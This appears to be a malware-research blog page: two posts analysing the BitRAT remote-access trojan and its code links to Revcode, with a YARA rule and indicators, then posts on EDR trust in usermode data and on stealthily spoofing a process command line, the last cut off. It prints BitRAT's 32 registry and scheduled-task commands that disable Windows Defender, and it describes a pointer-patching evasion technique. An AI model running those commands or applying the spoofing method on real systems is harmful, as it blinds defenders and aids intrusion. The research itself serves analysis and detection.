BitRAT pt. 2: Hidden Browser, SOCKS5 proxy, and UnknownProducts Unmasked

Posted on

Pt. 1 of the BitRAT series.

During my initial analysis, there were several features in BitRAT that I did not have the opportunity to fully analyze. As such, I thought another post is merited to explore these functionalities further. In addition to this, analysis of the binary revealed strong similarities and shared code with the Revcode malware. We could from this infer that BitRAT has a significant relationship to Revcode, whether it is the developers sharing code or the developers being in fact the same person. The information leading to this assessment will be explored in detail in the last section of the post.

Hidden Browser

I did not explore the Hidden Browser feature in much detail initially, as I assumed it would merely be an interface built on top of TinyNuke’s HVNC. However, this assumption was incorrect. The Hidden Browser (command 65-6E) is implemented separately and from scratch. The first command (0x65) calls the remote browser initializer (004B6A64), which is a considerably large function due to the heavy use of STL, Boost, and string obfuscation. Due to this, screenshots will be combined and cut to fit in the article. First, it generates a random 16-character string, which it then uses to create a named desktop.

Then, it tries to obtain the default installed browser by querying the file association for the “.html” extension.

Currently, only Chrome is supported and the function returns prematurely if another browser is set as the default .html  handler. BitRAT then checks to see if Chrome is already running. If this is the case, it creates a new browser profile in the temp directory, otherwise it uses the default profile.

It then appends some parameters disabling certain chrome features as is typical of HVNC browsers, creates the process and saves the browser window’s handle.

After this, the current thread enters a loop where it continuously screenshots the current browser and sends it back to the C2 server. The screenshot function makes use of BitBlt and GDI to take the screenshot, then convert it to a JPEG image and passes it back.

Parts of the image capturing code

Conversion to JPEG

Overall, the hidden browser is essentially another fairly basic HVNC implementation. For those not familiar with how HVNCs work, MalwareTech’s post is a fairly simple introduction that should clear things up.

SOCKS5 Proxy

For interfacing with the tor service that is dropped to disk, BitRAT makes use of the SOCKS5 library “socks5-cpp“. Interestingly, around 3 years ago a Steemit post was made describing how to use this specific library for sending traffic through Tor, this is presumably where the idea was taken from.

 

 

UnknownProducts, BitRAT, and the link to Revcode

A few days after I posted my initial article on BitRAT, @tildedennis noted that BitRAT is quite similar to the Revcode malware. Though I didn’t see it for a few days due to Twitter filtering out the notification, I was immediately interested for several reasons:

  1. I’ve dealt with Revcode before and have identified its author as Alex Yücel, notorious for developing the Blackshades malware.
  2. I knew that at one point, Revcode had a C++ payload that used Boost; however, I have not until now had a sample of this to look at and have only reverse-engineered the VB variant of it. The usage of Boost was shortly removed after it was implemented.
  3. UnknownProducts’ timezone is GMT+2, which matches Sweden. He previously pretended to be Russian, however this is utterly unconvincing for various reasons.

Given this reliable indicator that the two are possibly linked, a comparison between a sample of Revcode’s Boost variant (be535a8c325e4eec17bbc63d813f715d2c8af9fd23901135046fbc5c187aabb2) and BitRAT is in order. The sample was trivial to unpack, the packer stub was built on 18 Jan 2019 05:29:34 UTC and the Revcode file inside was built on 20 Dec 2018 03:02:36 UTC.

RunPE

What first caught my eye when reverse engineering BitRAT’s RunPE is how injection APIs are imported statically (refer to the previous post) and how a function parameter controls the return value.

While the rest of the RunPE was copy-pasted, I could not find any public RunPE implementation that has such an option for the return value or even one that references dwProcessId. As such, I immediately searched for references to injection-relevant APIs within Revcode and immediately found a virtually identical function with the same method for controlling the return value.

The rest of the code was virtually identical, with the only significant difference being that BitRAT encrypts the “NtUnmapViewOfSection” string.

RunPE in BitRAT

RunPE in Revcode

Keylogger

BitRAT’s keylogger hook callback (4ABC8D) decodes key data into human-readable strings. For example, the strings “{NUMPAD_2}”, “{NUMPAD_5}”, “{NUMPAD_7}”, “{F12}” are used to represent such keys. The same strings are used in Revcode. In fact, the entire keyboard hook function is identical.

Part of BitRAT’s keylogger callback

Part of Revcode’s keylogger callback

Service Manager function

The service manager shares identical strings such as “Boot Start,” “Win32 share process”, “The service is stopped,” “The service is in the process of being stopped.” While these strings are likely widely used elsewhere, they are referenced in the same manner and order. Furthermore, a comparison of the control flow graph reveals that BitRAT’s service manager only differs in complexity and length due to string encryption and SEH.

The flow graph of the service manager function. BitRAT is on the left, while Revcode is on the right.

Identical command handling mechanisms

A significant amount of command names are similar between the two malware. Both abbreviates “process” as  “prc”. Both do not abbreviate “webcam”. Furthermore, both BitRAT and Revcode set up a table of command strings and command IDs the same way. The command string gets passed to a function that returns a DWORD pointer, which is dereferenced to set the command ID. The only difference between the two in the command text and the lack of string encryption in Revcode.

BitRAT’s command list initialization

Revcode’s command list initialization

Audio recording

BitRAT and Revcode both use A. Riazi’s Voice Recording library for recording audio from machines infected by it. The only difference is that in BitRAT the debugging strings are stripped out while they are present inside Revcode.

CVoiceRecording::Record in BitRAT

CVoiceRecording::Record in Revcode

Other shared strings

Some tag strings presumably for formatting data for communication are common between the two.

 

Decrypted BitRAT strings

Strings from the Revcode binary

Conclusion

Given the findings above, it should be fairly evident that BitRAT is a successor to Revcode’s Boost payload.  Sadly, UnknownProducts’ bid to remain unknown did not work out too well due to the practice of code reuse. While it is possible that the relationship is based only on code-sharing, the combination of the matching timezone makes this unlikely to be the case. Revcode dropped around March 2019, and in April 2019, UnknownProducts posted the initial development thread for BitRAT. The product was finally released in June, suggesting that Revcode’s Boost and non-Boost codebase were split into two, one for sales as Revcode and one for sales as BitRAT. This split was probably done to increase sales and market presence and to allow the aggressive marketing of illicit features such as HVNCs and remote browsers, which are meant exclusively for fraud.

You can now inline lambdas in MSVC

Posted on

 

Short quick post, MSVC has finally added support for inlining lambdas. It was added to the preview late June, and finally was released early August (after people asking for this feature for 2+ years). You can explicitly tell the compiler to inline a lambda by using [[msvc::forceinline]] now.

Generated code:

This is done with #pragma optimize(“”, off), if optimization was on everything would be optimized to return the final number.

BitRAT – The Latest in C++ Malware Written by Incompetent Developers

Posted on

To yearn for an HVNC sample that is not ISFB or TinyNuke is a sure sign that you are reverse engineering too much malware.

– Me

 

I was recently made aware of a somewhat new malware being sold under the name “BitRAT” by the seller “UnknownProducts” on HackForums. As far as I know, there has been no public analysis of this malware yet. The seller’s comments indicate inexperience with malware development, as demonstrated by him bragging about using Boost, OpenSSL, and LibCURL in his malware.

The screenshot provided was even more laughable, as we can see the developer used std::thread along with sleep_for. Given the heavy use of such libraries, the malware might as well be in Java. The naming convention is also inconsistent, mixing Hungarian notation (bOpen) with snake_case (m_ssl_stream), with the latter name being copied from an open-source project.

https://i.imgur.com/8tag2tu.png

 

The Tor binary is also dropped to disk, something which no competent malware developer would do. Anyways, enough about the author’s posts, let us move on to analyzing the files at hand. The goal of this analysis is to do the following:

  • Analyze the controller and see how it communicates with the developer’s server.
  • Break the various obfuscation and anti-analysis tricks used by BitRAT.
  • Analyze the behavior and functionality of the RATs and how some features are implemented.
  • Study the relationship between BitRAT and several other malware that it is related to.

The Controller

In this section, I’ll describe BitRAT’s licensing protocol and how the malware controller determines whether the person running it is a paying customer or not. The controller software is developed in .NET and is obfuscated with Eazfuscator. The version I have was compiled on the 17th of August at 11:35:05 UTC.

The licensing protocol starts with the following HTTP request being sent:

GET /lic.php?h=HWID&t=unknown_value&s=unknown_value HTTP/1.1
Host: unknownposdhmyrm.onion
Proxy-Connection: Keep-Alive

The response is the following string, base64 encoded:

unknown_value|NO if not licensed, OK if licensed|0|1.26|1|base64_status_update_message||

If there is no valid license associated with the HWID, the following 2 requests are made to create a purchase order:

GET /step_1.php?hwid=HWID&uniqueid=HWID&product_id=1 HTTP/1.1
Host: unknownposdhmyrm.onion
Proxy-Connection: Keep-Alive

GET /step_2.php?product_id=1&step=2&uniqueid=HWID HTTP/1.1
Host: unknownposdhmyrm.onion
Proxy-Connection: Keep-Alive

If you want to update your HWID, the following request is made

GET /hwid_update.php?hwid_old=[oldhwid]&hwid_new=[newhwid] HTTP/1.1
Host: unknownposdhmyrm.onion
Proxy-Connection: Keep-Alive

The payloads are built on the vendor’s server.

GET /client/clientcreate.php?hwid=hwid_here&type=standard&ip_address=google.com&tcp_main_port=3933&tcp_tor_service_port=0&install_folder=google&install_filename=googleee.exe&pw_hash=535c3fd67cf3e03b01bcc6b7e64e410&tor_prcname=0 Host: unknownposdhmyrm.onion
Proxy-Connection: Keep-Alive

The parameters are as follow:

hwid: self explanatory
type: "standard" or "tor"
ip_address: self explanatory
tcp_main_port: self explanatory, 0 if tor
tcp_tor_service_port: 80 if tor, 0 if standard
install_folder and install_filename: self explanatory
pw_hash: MD5 hash of the selected communication password.
tor_prcname: name of the dropped tor.exe binary. 0 if standard.

The server runs Apache/2.4.29 (Ubuntu) and has a directory called “l” with contents unknown.

The Payload

The main sample that I will discuss is 7faef4d80d1100c3a233548473d4dd7d5bb570dd83e8d6e5faff509d6726baf2. It is written in Visual C++ with libraries including Boost, libCURL among other libraries. It was compiled with Visual Studio 2015 Build 14.0.24215 on the 14th of August at 01:32:11 UTC. The first part of the following section will discuss some of the obfuscation that BitRAT uses, the rest will focus on discussing the behaviors and functionalities as well as how those are implemented.

String Pointers

The file for reasons that are initially unknown stores string pointers into an array instead of using them directly. This is dealt with rather easily using an IDAPython script (attached at the end of the article).

Before (top) and after (bottom) renaming

Dynamic API

Some APIs in the file are loaded dynamically. The code for loading this is quite strange. First, LoadLibraryA is resolved and some DLLs are loaded with it. Then, the author resolved GetProcAddress using GetProcAddress. This highly redundant code is something that no experienced developer would write.

The APIs are then resolved. As we can see from the code the results are strangely not stored at times, for example, in this snippet WSACleanup is never stored anywhere. As was the case before, we dealt with this easily using IDAPython (the name for pmemset shown is automatically generated).

The end of the function is also shrouded in mystery, with the UTF-8 strings for the DLL names being turned into wide-character strings on the heap and then finally returned.

All of these strange quirks didn’t make sense at first, but then it struck me that I’ve seen this done before: this very API loader is a complete paste from TinyNuke. Further examination confirmed this and that some function pointers are not saved due to compiler optimization. Analyzing the code further, one could see that the entire HVNC/Remote Browser portion of BitRAT is a paste of TinyNuke with minimal modification. We’ll go into more details of this in the later section covering the HVNC/Hidden Browser.

String Encryption

Strings are encrypted at compile time using LeFF’s constexpr trick which is copied completely and unmodified. Strangely enough, Flare’s FLOSS tool does not work well on the payload for reasons unknown. As such, other less automated approaches are required for defeating this obfuscation. For this part, I had the help of defcon42 who aided greatly in writing the IDAPython scripts.

First, there are strings that are properly encrypted as LeFF intended.

Second, there are strings that MSVC for reasons unknown (read: being a bad compiler) didn’t perform constexpr evaluation on. For this, we used another script with another pattern.

Third, there are strings for which the decryption function was not inlined (as developers who are well acquainted with MSVC would know, __forceinline is much more like __maybeinlineifyoufeellikeit. Perhaps MS should consider adding the keyword __actuallyinlinewhenforceinlineisused). This is often paired with the second variant of un-obfuscation. For this, we can hook the decryptor function (which are clustered together and easy to find manually) and dump the output and caller address.

There possibly are other patterns that are generated due to compiler optimization that was missed during this process. Since the developer so nicely made use of std::string and std::wstring, I also wrote up a quick hooking library to hook the constructor of std::string and std::wstring and log the string and return address.

With this, we likely have almost all of the strings that are used by BitRAT. There possibly are some strings left over that we didn’t identify, but for the purpose of a preliminary static analysis, this is good enough.

Antidebug

BitRAT uses NtSetInformationThread with ThreadHideFromDebugger for anti-debugging purposes.

Command Dispatcher

The command dispatcher takes the form of a switch-turned-into-jump-table.

The array has 0x88 elements, corresponding to 0x88 unique commands. Initially, I attempted the tedious work of identifying what each of these commands semi-manually, but after working my way through around 30 commands I discovered a function (4D545D) where the list of command strings and their corresponding ID is built. The function takes the form of the following statement being repeated 0x88 times for each command.

Because statically extracting this information would be extremely tedious as the compiler generates code that does not fall neatly into patterns, I dumped the table dynamically through hooking the create_command_entry function. The full table of commands and corresponding ID is listed below:

cli_rc | 00
cli_dc | 01
cli_un | 02
cli_sleep | 03
[...] full list at https://gitlab.com/krabsonsecurity/bitrat/-/blob/master/command_list.txt
hvnc_start_run | 84
hvnc_start_ff | 85
hvnc_start_chrome | 86
hvnc_start_ie | 87

Following this, I’ll be discussing some of the most notable commands and features that the RAT has.

HVNC/Hidden Browser

The HVNC/Hidden Browser feature of this RAT is entirely copypasted from TinyNuke. The following functions from TinyNuke are present in their entirety:

The commands hvnc_start_explorer, hvnc_start_run, hvnc_start_ff, hvnc_start_chrome, hvnc_start_ie are simply copied from TinyNuke with minimal modifications. Below are two side-by-side comparisons of the code to show the level of copy-pasting I’m talking about. The top screenshot is TinyNuke, the bottom is also TinyNuke but inside BitRAT.

TinyNuke (top) and BitRAT (bottom)

TinyNuke (top) and BitRAT (bottom)

One of the most obvious indicators of TinyNuke’s HVNC is the traffic header value “AVE_MARIA” which UnknownProducts did not change.

TinyNuke (top) and BitRAT (bottom)

The HVNC client (located at data\modules\hvnc.exe) is also a complete rip-off of TinyNuke.

BitRAT’s hvnc.exe file

TinyNuke’s HVNC Server project

BitRAT’s “hvnc.exe” file

BitRAT’s “hvnc.exe” file

UAC Bypass

The UAC Bypass uses the fodhelper trick to elevate its privileges. The same code is embedded in multiple functions including the Windows Defender Killer code as well as the persistence code.

Windows Defender Killer

Arguably, this is the most laughable feature of the malware. The first few lines of assembly alone express the sheer absurdity of it.

WinExec? Are we still living in 2006? The function is only around for compatibility with 16-bit Windows!

BitRAT proceeds to run 32 different commands using WinExec to disable Windows Defender. They are as follow.

[esp] 0019F34C "reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f"
[esp] 0019F5F0 "reg delete \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /f"
[esp] 0019FD3C "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiSpyware\" /t REG_DWORD /d \"1\" /f"
[esp] 0019FBDC "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d \"1\" /f"
[esp] 0019FCC8 "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine\" /v \"MpEnablePus\" / t REG_DWORD /d \"0\" /f"
[esp] 0019F638 "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableBehaviorMonitoring\" /t REG_DWORD /d \"1\" /f"
[esp] 0019F6C4 "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableIOAVProtection\" /t REG_DWORD /d \"1\" /f"
[esp] 0019FE24 "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableOnAccessProtection\" /t REG_DWORD /d \"1\" /f"
[esp] 0019F3B8 "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableRealtimeMonitoring\" /t REG_DWORD /d \"1\" /f"
[esp] 0019F2B8 "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableScanOnRealtimeEnable\" /t REG_DWORD /d \"1\" /f"
[esp] 0019F74C "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" /v \"DisableEnhancedNotifications\" /t REG_DWORD /d \"1\" /f"
[esp] 0019F444 "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"DisableBlockAtFirstSeen\" /t REG_DWORD /d \"1\" /f"
[esp] 0019F880 "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SpynetReporting\" /t REG_DWORD /d \"0\" /f"
[esp] 0019FA7C "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SubmitSamplesConsent\" /t REG_DWORD /d \"2\" /f"
[esp] 0019FDAC "reg add \"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderApiLogger\" /v \"Start\" /t REG_DWORD /d \"0\" /f"
[esp] 0019FC4C "reg add \"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderAuditLogger\" /v \"Start\" /t REG_DWORD /d \"0\" /f"
[esp] 0019F95C "schtasks /Change /TN \"Microsoft\\Windows\\ExploitGuard\\ExploitGuard MDM policy Refresh\" /Disable"
[esp] 0019F4C4 "schtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Cache Maintenance\" /Disable"
[esp] 0019FA18 "schtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Cleanup\" /Disable"
[esp] 0019F8F4 "schtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan\" /Disable"
[esp] 0019F52C "schtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Verification\" /Disable"
[esp] 0019F808 "reg delete \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run\" /v \"SecurityHealth\" /f"
[esp] 0019F590 "reg delete \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"SecurityHealth\" /f"
[esp] 0019F7CC "reg delete \"HKCR\\*\\shellex\\ContextMenuHandlers\\EPP\" /f"
[esp] 0019FB98 "reg delete \"HKCR\\Directory\\shellex\\ContextMenuHandlers\\EPP\" /f"
[esp] 0019FAF4 "reg delete \"HKCR\\Drive\\shellex\\ContextMenuHandlers\\EPP\" /f"
[esp] 0019F9BC "reg add \"HKLM\\System\\CurrentControlSet\\Services\\WdBoot\" /v \"Start\" /t REG_DWORD /d \"4\" /f"
[esp] 0019F258 "reg add \"HKLM\\System\\CurrentControlSet\\Services\\WdFilter\" /v \"Start\" /t REG_DWORD /d \"4\" /f"
[esp] 0019F198 "reg add \"HKLM\\System\\CurrentControlSet\\Services\\WdNisDrv\" /v \"Start\" /t REG_DWORD /d \"4\" /f"
[esp] 0019F1F8 "reg add \"HKLM\\System\\CurrentControlSet\\Services\\WdNisSvc\" /v \"Start\" /t REG_DWORD /d \"4\" /f"
[esp] 0019FB34 "reg add \"HKLM\\System\\CurrentControlSet\\Services\\WinDefend\" /v \"Start\" /t REG_DWORD /d \"4\" /f"
[esp] 0019F34C "reg add \"HKLM\\Software\\Microsoft\\Windows Defender\\Features\" /v \"TamperProtection\" /t REG_DWORD /d \"0\" /f"

Persistence

BitRAT uses the BreakOnTermination flag through the function RtlSetProcessIsCritical (48563B) to cause a bugcheck on termination of the process. This is done when the command line parameter -prs is present. In addition, it also attempts to elevate privileges using the fodhelper method whenever persistence is activated.

Webcam and Voice Recording

Both of these rely on open source libraries, OpenCV for webcam capture, and A. Riazi’s Voice Recording library with some debugging code removed.

Download and Execute

Usually, I would not discuss such a trivial function, but the malware author managed to write this in a peculiarly terrible way. There are basically two different methods of downloading: the first performs the typical URLDownloadToFile + ShellExecute combo.

The peculiarity lies in the second execution path. Here, the developer opted to use libcurl to download the file to memory and then uses process hollowing/runPE to execute it.

The code is rather clearly copy-pasted, given the use of the default libcurl useragent. In addition, the process hollowing code used was one you would expect to see in 2008 crypters, not 2020 malware.

BSOD Generator

Like the function above, it is also rather trivial and I usually would not bother discussing this. However, even this was completely copy-pasted from StackOverflow.

Configuration

The configuration is edited into the file post-compilation by replacing two strings in the binary. The first string (offset 004C9C68) contains the encrypted configuration information, and the second string (offset 004C9E6C) contains part of what will become the decryption key.

First (004E1694), the encryption key is concatenated with the string “s0lmYr” (we will discuss this further in the next section).

Then (4E16AA), the result is MD5 hashed and truncated down to 16 characters (4E16B8).

Finally (004E16FE), the key is used to decrypt the configuration block. The decryption function uses a class called “Enc”, which is a wrapper around an open source implementation of the Camellia encryption algorithm. Decrypting the configuration of the sample in question (68ac9b8a92005de3a7fe840ad07ec9adf84ed732c4c6a19ee2f205cdbda82b9a4a05ae3d416a39aaf5c598d75bf6c0de00450603400f480879941df9ad9f61f01959d98df31f748e8761d8aa79552c751e208a939d58edf6af7d7215412144355d9dbc1b71567ac895b3fecd3552050b0d1ac6698cf6e43d605f5cabec11853cdd7aa26dfeed45878d12c16eb95cf0805135fb2abab8632e918df7b192946e5d) with the key we generated (ac4016133b9d18e2), we get the final configuration data, which is as follow:

khw3lix3kcivpsmlgglqao2ntut5gmp2ydmvnn5leduil554po5n2wad.onion|0|80|0c9c6aaa257aced0|Xauth|auth.exe|b43e92f859a4b4e81c5c7768339be3e7|Runtime Broker|

We can from this infer that the format is:

hostname|non-tor port|tor port|unknown value|installation folder|installation name|md5 of communication password|tor process name

The unknown value is unique across builds including builds from the same customer. It is possibly used by the malware author to track builds generated by customers but we can’t say much without guessing.

Possible Link to Warzone RAT

Recall the string that was concatenated to generate the key for decrypting the configuration.

As we know, Solmyr is the developer of Warzone, another RAT on HF. The features of the two RATs are somewhat similar, and both are copy-pasted from TinyNuke (Version 1.2 and up of Warzone had the string “AVE_MARIA” from the same stolen code leading incompetent reverse engineers at “threat intelligence” companies [1][2][3][4] to calling it “Ave Maria stealer/RAT” because they couldn’t figure out that this is just TinyNuke’s Hidden VNC).

However, there are a wide variety of differences that indicate that the two are not developed by the same person. First of all, the coding styles of the two are significantly different, Warzone was for the most part lightweight while BitRAT is heavily bloated. The portion of TinyNuke that was copy-pasted is slightly different as well, with BitRAT utilizing the API loading mechanism while Warzone used the regular import table and slightly modified the code as well. Below is the comparison of ConnectServer in the two RATs.

BitRAT

Warzone

Many functionalities are also implemented differently. For example, BitRAT uses SetWindowsHookExW(WH_KEYBOARD_LL) to perform keylogging (004AFD7A), while Warzone uses a Window callback and GetRawInputData to achieve this purpose.

UnknownProducts, the developer of BitRAT, was a customer of Warzone at one point.

It is possible that the developers of the two malware have some form of code-sharing or contractual relationship. However, as there is not much public information available regarding the relationship between the two developers, we could only speculate as to why “s0lmYr” was present as a key in BitRAT.

Final Thoughts and Notes

As is the case with most HF malware, BitRAT is best described as an amalgamation of poorly pasted leaked source code slapped together alongside a fancy C# GUI. It makes heavy uses of libraries such as C++ Standard Library, Boost, OpenCV, and libcurl, as well as code copied directly from leaked malware source code or sites including StackOverflow. The choice of Camellia is somewhat unique, I have not seen this specific algorithm used in malware before.

In marketing the malware, the author makes multiple false claims. He asserted that the malware is “Fully Unicode compatible” while the TinyNuke code used ANSI APIs, he claimed the persistence is “impossible to kill” when in reality BreakOnTermination doesn’t make the process impossible to terminate and can be easily unset the same way it was set. Features such as the Windows Defender killer are terribly done and would catch the eye of anyone monitoring the system, and last but not least, the claim that the developer “[didn’t] copy anything” is most patently untrue, thankfully we “skilled reverse engineers” did in fact “compare signatures and generic behavior”. It is disappointing how easy it is for anyone with minimal programming experience can whip up a quick malware and make a profit harming others.

YARA Rule

rule BitRATStringBased
{
    meta:
        author = "KrabsOnSecurity"
        date = "2020-8-22"
        description = "String-based rule for detecting BitRAT malware payload"
    strings:
        $tinynuke_paste1 = "TaskbarGlomLevel"
        $tinynuke_paste2 = "profiles.ini"
        $tinynuke_paste3 = "RtlCreateUserThread"
        $tinynuke_paste4 = "127.0.0.1"
        $tinynuke_paste5 = "Shell_TrayWnd"
        $tinynuke_paste6 = "cmd.exe /c start "
        $tinynuke_paste7 = "nss3.dll"
        $tinynuke_paste8 = "IsRelative="
        $tinynuke_paste9 = "-no-remote -profile "
        $tinynuke_paste10 = "AVE_MARIA"
        
        $commandline1 = "-prs" wide
        $commandline2 = "-wdkill" wide
        $commandline3 = "-uac" wide
        $commandline4 = "-fwa" wide
    condition:
        (8 of ($tinynuke_paste*)) and (3 of ($commandline*))
}

Hashes

  • 7faef4d80d1100c3a233548473d4dd7d5bb570dd83e8d6e5faff509d6726baf2 (I’ve uploaded this to VirusBay, if you have access to neither VT and VB feel free to message me on Twitter and I’ll share the file.)
  • 278e32f0a92deca14b2a1c2c7984ebf505bbe8337d31440b7f1d239466f4bb74
  • 495bf0fc6abef22302d9ac4c66017fc6c7b767b32746db296ac8d25e77e28906
  • d0abc08b50b1285f484832548dab453203f9b654e2a36c1675d3a9e835419ff4
  • eb82628a61e11bf8a91a687ce55a4615ef3d744635a864aefa7e79c8091ce55c
  • e7860957e268e4cdb8b63a3cf81f450cbfbb31d1cf78e6cc11f6f15cb157b409

Network Indicators

  • TLS certificate with subject matching issuer and CN=BitRAT.
  • Tor traffic.
  • User-agent: “libcurl-agent/1.0” (though this would also be present in some legitimate traffic).

Tools

I’ve published the source code of several scripts and tools I made during the process of reverse engineering. I’ve only published one of the string decryption scripts because the rest are rather unfinished and unreliable. The command hook tool uses the Subhook library. You can view the code on Gitlab.

Relying on usermode data is a bad idea (AKA Stop Trusting The Enemy)

Posted on

This is going to be a relatively short post which won’t contain much code in itself but rather some observations I made on the state of existing security and logging utilities, with Sysmon’s handling of usermode modules being the case study.

Recently, a lot of people realized that Sysmon’s stack trace feature is quite useful for detecting code execution from non-module memory. This feature is indeed very nice and can detect most existing attacks which rely on code injection or manual mapping, however the implementation is significantly flawed. 0x00dtm rightly pointed out this out, which resulted in anyone being able to tamper with the PEB and feed false data to Sysmon.

This issue is not isolated, it is the norm. A significant amount of existing EDRs and monitoring tools rely on information that is fully controllable by the threats they’re supposed to stop. From usermode hooking to relying on the PEB for information about a process, the assumption that usermode data is safe for consumption is ubiquitous. Does this not clearly create a giant gap where an attacker can manipulate the information that EDRs and SIEMs depend on to provide context to defenders, giving them the ability to deceive defenders and security solutions?

Given this example of Sysmon relying on PEB to find out where calls are coming from and the problem with it, what is the right way to do things that doesn’t rely on information controllable by the attacker? Why, APIs provided by the Windows Kernel for this very purpose, of course. Calling ZwQueryVirtualMemory with MemoryMappedFilenameInformation will get you the module a memory address belongs to (if any) in a reliable manner.

Here’s a bit of in-depth details which hopefully explains why this method is more reliable than reading PEB. The VAD tree structure describes the virtual address space of a process. VAD (Virtual Address Descriptor) entries have a _CONTROL_AREA structure, which contains the field FilePointer of type _FILE_OBJECT. This field is set whenever Windows map a file to a process’s virtual memory, and points to a descriptor for the file that was mapped. And, where does this all get stored? In the kernel address space. What does this mean? That means this information is out of reach for an attacker sitting in usermode, who has no way to mess with the VAD the way they could freely modify the PEB.

Given this, a question must be asked. Why are people still making the assumption that we can trust the integrity of usermode data, which is fully controllable by any attacker who has achieved code execution?

On a bit of a tangent, even were ZwQueryVirtualMemory used, it is still possible to mess with the calltrace through stack manipulation (though this requires significantly more effort and has more constraints compared to the previous method). I’m not going to go into details into this right now, maybe I’ll share my PoC and further information in another post.

Of course, relying on information from the kernel alone and blindly isn’t a silver bullet to stop all the manipulations that can happen. Window’s handling of file renames as an example is notoriously problematic and causes significant visibility gaps for monitoring/security solutions. Regardless, the point is clear: trusting usermode data, even when sanitized somewhat, is a terrible terrible idea. Usermode data should only be used when no reliable alternatives are available – lest it be used to deceive the very defenders it is supposed to inform.

Protected: c

Posted on

This content is password protected. To view it please enter your password below:

Protected: b

Posted on

This content is password protected. To view it please enter your password below:

Protected: a

Posted on

This content is password protected. To view it please enter your password below:

A stealthier approach to spoofing process command line

Posted on

A well known trick that has been employed in malware for a very long time (this has been publicly discussed on HF since at least 2014: showthread.php?tid=4548593) is spoofing command line argument. More recently, this method got discovered by the wider infosec community and was incorporated into tools like Cobalt Strike. Implementations often go like this: you start a process as suspended with a fake command line argument, patch the PEB with the real argument, and then resume the process. However, this solution is not stealthy at all, as we will see below.

The problem with PEB patching

The method relies on patching the PEB of the process in order to spoof the environment variable prior to the process’s start. This works as the command line argument is just a buffer that is passed to the process and can be modified from usermode. However, this causes some problems for those trying to hide it: it is very easy to spot.

As the kernel does not store a copy of the command line argument anywhere, the only place for monitoring tools to get the command line argument is through reading the process’s PEB. Both Process Hacker and Process Explorer does this and shows the in-memory command line argument. Below is a simple example where I overwrite the first 5 characters with “fake!” and how it shows up in these tools.

Process Explorer
Process Hacker

Any competent sysadmin would open one of these tools and look at your spoofed powershell-or-whatnot command and recognize it for what it is.

Some work has been done by tampering with the UNICODE_STRING structure through manipulation of the length member (processes typically would ignore this internally when using GetCommandLineW/A APIs, however process explorers generally do not and follow the constraints of UNICODE_STRING). This however only allows us to hide a part of the command line parameter, and does not allow us to spoof the entire parameter. The entire string would also still be there in memory, and as it is virtually always NULL-terminated a tool could decide to ignore the length parameter and read until it reaches a NULL byte instead.

Command line internals

To look for alternatives, we must first understand how processes usually get access to the command line parameter, which is through the GetCommandLineW/A parameter. Probably for performance’s sake, the function does not actually access the PEB, instead it reads from a hardcoded pointer to an UNICODE_STRING/STRING.

This is initialized prior to the execution of the entrypoint of the process in BaseDllInitialize (or KernelBaseDllInitialize, as it’s now called on Windows 10) and points to the same information that was in the PEB at this stage.

As a result of this caching, modification of the PEB post-initialization does not affect most process’s attempts to read their own command line parameter, so we can’t just start a process unsuspended and then patch the PEB. However, this does introduce an interesting side effect: we now have two additional places where we can tamper with the command line parameter without it being visible to Process Hacker and similar tools.

Method 1: Patching BaseUnicode/AnsiCommandLine

As seen in the disassembly above, GetCommandLine simply dereferences and returns a hardcoded pointer. While this address is not exported, we can easily retrieve the relevant offset from the GetCommandLine API itself. Frome Windows XP to 10 (I have not validated this on prior Windows versions, but feel free to), the functions has not changed and is as follow:

 mov eax, dword ptr ds:[offset_to_buffer]
 ret

And likewise on x64 environments,

 mov rax, qword ptr ds:[offset_to_buffer]
 ret

What this effectively means is that we can get the address of GetCommandLine, parse it and extract the pointer (the pattern is A1 34570475 C3 for 32 bit processes), patch the pointer there and voila, any subsequent calls to GetCommandLine will return whatever we want it to. An even neater thing is that everything up until the patching it does not require reading memory from a remote process, as ASLR does not randomize module base address across processes, and as long as you have the same bitness as your target process the address will be the same.

With this method, there are some nuances that needs to be addressed. The first is that from a certain Windows version the function no longer resides in kernel32 but instead in kernelbase. This however is easily addressed and takes no difficulty to deal with. The second is that this needs to be done after the process has started execution (as BaseDllInitialize would just overwrite the pointer otherwise, and kernel32 wouldn’t be loaded yet), this can be remedied by patching the entrypoint with EB FE (a jump to self, an useful instruction to remember for unpacking certain malware), fixing the pointers, suspending the thread, restoring the original bytes and then resuming the main thread. It is not really possible to avoid starting the process as suspended unfortunately due to this timing issue.

Method 2: Modifying GetCommandLine

